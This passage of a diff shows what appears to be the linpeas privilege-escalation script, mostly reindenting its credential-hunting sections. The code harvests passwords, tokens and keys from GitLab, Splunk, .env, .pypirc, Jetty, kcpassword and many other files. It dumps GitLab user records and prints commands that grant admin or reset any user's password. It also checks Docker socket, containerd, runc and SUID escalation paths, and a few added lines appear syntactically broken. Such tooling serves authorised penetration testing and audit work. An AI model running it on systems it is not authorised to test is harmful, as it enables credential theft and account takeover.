f; do ls -ld "$f" | sed -${E} "s,storage\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"database\.php$\"`" ]; then echo_not_found "database.php"; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "database\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,database\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; - ##-- SI) passwd files (splunk) - print_2title "Searching uncommon passwd files (splunk)" - SPLUNK_BIN="$(command -v splunk 2>/dev/null)" - if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi - printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do - if [ -f "$f" ] && ! [ -x "$f" ]; then - echo "passwd file: $f" | sed "s,$f,${SED_RED}," - cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," - fi - done - echo "" - - print_2title "Analyzing kcpassword files" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword" - printf "%s\n" "$PSTORAGE_KCPASSWORD\n" | while read f; do - echo "$f" | sed -${E} "s,.*,${SED_RED}," - base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - done - echo "" - - ##-- SI) Gitlab - print_2title "Searching GitLab related files" - #Check gitlab-rails - if [ "$(command -v gitlab-rails)" ]; then - echo "gitlab-rails was found. Trying to dump users..." - gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," - echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" - echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" - echo "" +##-- SI) passwd files (splunk) +print_2title "Searching uncommon passwd files (splunk)" +SPLUNK_BIN="$(command -v splunk 2>/dev/null)" +if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi +printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do + if [ -f "$f" ] && ! [ -x "$f" ]; then + echo "passwd file: $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," fi - if [ "$(command -v gitlab-backup)" ]; then - echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'" - echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" - echo "" - fi - #Check gitlab files - printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do - if echo $f | grep -q secrets.yml; then - echo "Found $f" | sed "s,$f,${SED_RED}," - cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" - elif echo $f | grep -q gitlab.yml; then - echo "Found $f" | sed "s,$f,${SED_RED}," - cat "$f" | grep -A 4 "repositories:" - elif echo $f | grep -q gitlab.rb; then - echo "Found $f" | sed "s,$f,${SED_RED}," - cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED}," - fi - echo "" - done - echo "" +done +echo "" - print_2title "Analyzing Github Files (limit 70)" +print_2title "Analyzing kcpassword files" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword" +printf "%s\n" "$PSTORAGE_KCPASSWORD\n" | while read f; do + echo "$f" | sed -${E} "s,.*,${SED_RED}," + base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +done +echo "" + +##-- SI) Gitlab +print_2title "Searching GitLab related files" +#Check gitlab-rails +if [ "$(command -v gitlab-rails)" ]; then + echo "gitlab-rails was found. Trying to dump users..." + gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," + echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" + echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" + echo "" +fi +if [ "$(command -v gitlab-backup)" ]; then + echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'" + echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" + echo "" +fi +#Check gitlab files +printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do + if echo $f | grep -q secrets.yml; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" + elif echo $f | grep -q gitlab.yml; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" | grep -A 4 "repositories:" + elif echo $f | grep -q gitlab.rb; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED}," + fi + echo "" +done +echo "" + + print_2title "Analyzing Github Files (limit 70)" if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.github$\"`" ]; then echo_not_found ".github"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.github$" | while read f; do ls -ld "$f" | sed -${E} "s,\.github$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.gitconfig$\"`" ]; then echo_not_found ".gitconfig"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.gitconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gitconfig$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git-credentials$\"`" ]; then echo_not_found ".git-credentials"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git-credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git-credentials$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git$\"`" ]; then echo_not_found ".git"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Svn Files (limit 70)" + print_2title "Analyzing Svn Files (limit 70)" if ! [ "`echo \"$PSTORAGE_SVN\" | grep -E \"\.svn$\"`" ]; then echo_not_found ".svn"; fi; printf "%s" "$PSTORAGE_SVN" | grep -E "\.svn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.svn$,${SED_RED},"; ls -lRA "$f";done; echo ""; - print_2title "Analyzing PGP-GPG Files (limit 70)" + print_2title "Analyzing PGP-GPG Files (limit 70)" ( (command -v gpg && gpg --list-keys) || echo_not_found "gpg") 2>/dev/null ( (command -v netpgpkeys && netpgpkeys --list-keys) || echo_not_found "netpgpkeys") 2>/dev/null (command -v netpgp || echo_not_found "netpgp") 2>/dev/null @@ -2938,127 +2900,127 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gnupg$\"`" ]; then echo_not_found "*.gnupg"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gnupg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gnupg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analyzing Cache Vi Files (limit 70)" + print_2title "Analyzing Cache Vi Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.swp$\"`" ]; then echo_not_found "*.swp"; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.swp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.swp$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.viminfo$\"`" ]; then echo_not_found "*.viminfo"; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.viminfo$" | while read f; do ls -ld "$f" | sed -${E} "s,\.viminfo$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Wget Files (limit 70)" + print_2title "Analyzing Wget Files (limit 70)" if ! [ "`echo \"$PSTORAGE_WGET\" | grep -E \"\.wgetrc$\"`" ]; then echo_not_found ".wgetrc"; fi; printf "%s" "$PSTORAGE_WGET" | grep -E "\.wgetrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.wgetrc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; - ##-- SI) containerd installed - print_2title "Checking if containerd(ctr) is available" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" - containerd=$(command -v ctr) - if [ "$containerd" ]; then - echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," - ctr image list +##-- SI) containerd installed +print_2title "Checking if containerd(ctr) is available" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" +containerd=$(command -v ctr) +if [ "$containerd" ]; then + echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," + ctr image list +fi +echo "" + +##-- SI) runc installed +print_2title "Checking if runc is available" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" +runc=$(command -v runc) +if [ "$runc" ]; then + echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," +fi +echo "" + +#-- SI) Docker +print_2title "Searching docker files (limit 70)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket" +printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do + ls -l "$f" 2>/dev/null + if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then + echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," fi - echo "" +done +echo "" - ##-- SI) runc installed - print_2title "Checking if runc is available" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" - runc=$(command -v runc) - if [ "$runc" ]; then - echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," - fi - echo "" - - #-- SI) Docker - print_2title "Searching docker files (limit 70)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket" - printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do - ls -l "$f" 2>/dev/null - if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then - echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - fi - done - echo "" - - print_2title "Analyzing Firefox Files (limit 70)" + print_2title "Analyzing Firefox Files (limit 70)" if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"\.mozilla$\"`" ]; then echo_not_found ".mozilla"; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "\.mozilla$" | while read f; do ls -ld "$f" | sed -${E} "s,\.mozilla$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"Firefox$\"`" ]; then echo_not_found "Firefox"; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "Firefox$" | while read f; do ls -ld "$f" | sed -${E} "s,Firefox$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analyzing Chrome Files (limit 70)" + print_2title "Analyzing Chrome Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"google-chrome$\"`" ]; then echo_not_found "google-chrome"; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "google-chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,google-chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"Chrome$\"`" ]; then echo_not_found "Chrome"; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "Chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,Chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analyzing Autologin Files (limit 70)" + print_2title "Analyzing Autologin Files (limit 70)" if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin$\"`" ]; then echo_not_found "autologin"; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin\.conf$\"`" ]; then echo_not_found "autologin.conf"; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; - #-- SI) S/Key athentication - print_2title "S/Key authentication" - if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q skey; then - printf "System supports$RED S/Key$NC authentication\n" - if ! [ -d /etc/skey/ ]; then - echo "${GREEN}S/Key authentication enabled, but has not been initialized" - elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then - echo "${RED}/etc/skey/ is writable by you" - ls -ld /etc/skey/ - else - ls -ld /etc/skey/ 2>/dev/null - fi +#-- SI) S/Key athentication +print_2title "S/Key authentication" +if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q skey; then + printf "System supports$RED S/Key$NC authentication\n" + if ! [ -d /etc/skey/ ]; then + echo "${GREEN}S/Key authentication enabled, but has not been initialized" + elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then + echo "${RED}/etc/skey/ is writable by you" + ls -ld /etc/skey/ + else + ls -ld /etc/skey/ 2>/dev/null fi - echo "" +fi +echo "" - #-- SI) YubiKey athentication - print_2title "YubiKey authentication" - if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q yubikey; then - printf "System supports$RED YubiKey$NC authentication\n" - if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then - echo "${RED}/var/db/yubikey/ is writable by you" - ls -ld /var/db/yubikey/ - else - ls -ld /var/db/yubikey/ 2>/dev/null - fi +#-- SI) YubiKey athentication +print_2title "YubiKey authentication" +if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q yubikey; then + printf "System supports$RED YubiKey$NC authentication\n" + if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then + echo "${RED}/var/db/yubikey/ is writable by you" + ls -ld /var/db/yubikey/ + else + ls -ld /var/db/yubikey/ 2>/dev/null fi - echo "" +fi +echo "" - #-- SI) Passwords inside pam.d - print_2title "Passwords inside pam.d" - grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," - echo "" +#-- SI) Passwords inside pam.d +print_2title "Passwords inside pam.d" +grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," +echo "" - print_2title "Analyzing SNMP Files (limit 70)" + print_2title "Analyzing SNMP Files (limit 70)" if ! [ "`echo \"$PSTORAGE_SNMP\" | grep -E \"snmpd\.conf$\"`" ]; then echo_not_found "snmpd.conf"; fi; printf "%s" "$PSTORAGE_SNMP" | grep -E "snmpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,snmpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rocommunity|rwcommunity|extend.*" | sed -${E} "s,rocommunity|rwcommunity|extend.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Pypirc Files (limit 70)" + print_2title "Analyzing Pypirc Files (limit 70)" if ! [ "`echo \"$PSTORAGE_PYPIRC\" | grep -E \"\.pypirc$\"`" ]; then echo_not_found ".pypirc"; fi; printf "%s" "$PSTORAGE_PYPIRC" | grep -E "\.pypirc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pypirc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username|password,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Postfix Files (limit 70)" + print_2title "Analyzing Postfix Files (limit 70)" if ! [ "`echo \"$PSTORAGE_POSTFIX\" | grep -E \"postfix$\"`" ]; then echo_not_found "postfix"; fi; printf "%s" "$PSTORAGE_POSTFIX" | grep -E "postfix$" | while read f; do ls -ld "$f" | sed -${E} "s,postfix$,${SED_RED},"; for ff in $(find "$f" -name "master.cf"); do ls -ld "$ff" | sed -${E} "s,master.cf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "user=" | sed -${E} "s,user=|argv=,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analyzing Ldaprc Files (limit 70)" + print_2title "Analyzing Ldaprc Files (limit 70)" if ! [ "`echo \"$PSTORAGE_LDAPRC\" | grep -E \"\.ldaprc$\"`" ]; then echo_not_found ".ldaprc"; fi; printf "%s" "$PSTORAGE_LDAPRC" | grep -E "\.ldaprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ldaprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Env Files (limit 70)" + print_2title "Analyzing Env Files (limit 70)" if ! [ "`echo \"$PSTORAGE_ENV\" | grep -E \"\.env$\"`" ]; then echo_not_found ".env"; fi; printf "%s" "$PSTORAGE_ENV" | grep -E "\.env$" | while read f; do ls -ld "$f" | sed -${E} "s,\.env$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[tT][oO][kK][eE][N]|[dD][bB],${SED_RED},g"; done; echo ""; - print_2title "Analyzing Msmtprc Files (limit 70)" + print_2title "Analyzing Msmtprc Files (limit 70)" if ! [ "`echo \"$PSTORAGE_MSMTPRC\" | grep -E \"\.msmtprc$\"`" ]; then echo_not_found ".msmtprc"; fi; printf "%s" "$PSTORAGE_MSMTPRC" | grep -E "\.msmtprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.msmtprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Keepass Files (limit 70)" + print_2title "Analyzing Keepass Files (limit 70)" if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"\.kdbx$\"`" ]; then echo_not_found "*.kdbx"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "\.kdbx$" | while read f; do ls -ld "$f" | sed -${E} "s,\.kdbx$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.config.*$\"`" ]; then echo_not_found "KeePass.config*"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.config.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.config.*$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.ini$\"`" ]; then echo_not_found "KeePass.ini"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.enforced.*$\"`" ]; then echo_not_found "KeePass.enforced*"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.enforced.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.enforced.*$,${SED_RED},"; done; echo ""; - print_2title "Analyzing FTP Files (limit 70)" + print_2title "Analyzing FTP Files (limit 70)" if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"\.ftpconfig$\"`" ]; then echo_not_found "*.ftpconfig"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "\.ftpconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ftpconfig$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ffftp\.ini$\"`" ]; then echo_not_found "ffftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ffftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ffftp\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.ini$\"`" ]; then echo_not_found "ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.ini$,${SED_RED},"; done; echo ""; @@ -3069,7 +3031,7 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ws_ftp\.ini$\"`" ]; then echo_not_found "ws_ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Racoon Files (limit 70)" + print_2title "Analyzing Racoon Files (limit 70)" if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"racoon\.conf$\"`" ]; then echo_not_found "racoon.conf"; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "racoon\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,racoon\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,pre_shared_key.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"psk\.txt$\"`" ]; then echo_not_found "psk.txt"; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "psk\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,psk\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; @@ -3125,14 +3087,18 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_PASSBOLT\" | grep -E \"passbolt\.php$\"`" ]; then echo_not_found "passbolt.php"; fi; printf "%s" "$PSTORAGE_PASSBOLT" | grep -E "passbolt\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,passbolt\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "host|port|username|password|database" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; + print_2title "Analyzing Jetty Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_JETTY\" | grep -E \"jetty-realm\.properties$\"`" ]; then echo_not_found "jetty-realm.properties"; fi; printf "%s" "$PSTORAGE_JETTY" | grep -E "jetty-realm\.properties$" | while read f; do ls -ld "$f" | sed -${E} "s,jetty-realm\.properties$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Interesting logs Files (limit 70)" + + + print_2title "Analyzing Interesting logs Files (limit 70)" if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"access\.log$\"`" ]; then echo_not_found "access.log"; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "access\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,access\.log$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"error\.log$\"`" ]; then echo_not_found "error.log"; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "error\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,error\.log$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Windows Files Files (limit 70)" + print_2title "Analyzing Windows Files Files (limit 70)" if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.inf$\"`" ]; then echo_not_found "unattend.inf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.inf$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"\.rdg$\"`" ]; then echo_not_found "*.rdg"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "\.rdg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rdg$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"AppEvent\.Evt$\"`" ]; then echo_not_found "AppEvent.Evt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "AppEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,AppEvent\.Evt$,${SED_RED},"; done; echo ""; @@ -3184,7 +3150,7 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wsl\.exe$\"`" ]; then echo_not_found "wsl.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wsl\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,wsl\.exe$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Other Interesting Files Files (limit 70)" + print_2title "Analyzing Other Interesting Files Files (limit 70)" if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.bashrc$\"`" ]; then echo_not_found ".bashrc"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.bashrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bashrc$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.google_authenticator$\"`" ]; then echo_not_found ".google_authenticator"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.google_authenticator$" | while read f; do ls -ld "$f" | sed -${E} "s,\.google_authenticator$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"hosts\.equiv$\"`" ]; then echo_not_found "hosts.equiv"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "hosts\.equiv$" | while read f; do ls -ld "$f" | sed -${E} "s,hosts\.equiv$,${SED_RED},"; done; echo ""; @@ -3196,651 +3162,653 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.sudo_as_admin_successful$\"`" ]; then echo_not_found ".sudo_as_admin_successful"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.sudo_as_admin_successful$" | while read f; do ls -ld "$f" | sed -${E} "s,\.sudo_as_admin_successful$,${SED_RED},"; done; echo ""; - echo "" - - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +if echo $CHECKS | grep -q interesting_files; +print_title "Interesting Files" +########################################### +#----------) Interesting files (----------# +########################################### -if echo $CHECKS | grep -q IntFiles; then - ########################################### - #----------) Interesting files (----------# - ########################################### - print_title "Interesting Files" +##-- IF) SUID +print_2title "SUID - Check easy privesc, exploits and write perms" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +if ! [ "$STRINGS" ]; then + echo_not_found "strings" +fi +if ! [ "$STRACE" ]; then + echo_not_found "strace" +fi +suids_files=$(find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $suids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total"; then break; fi - ##-- IF) SUID - print_2title "SUID - Check easy privesc, exploits and write perms" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - if ! [ "$STRINGS" ]; then - echo_not_found "strings" - fi - if ! [ "$STRACE" ]; then - echo_not_found "strace" - fi - suids_files=$(find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) - for s in $suids_files; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total"; then break; fi - - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true 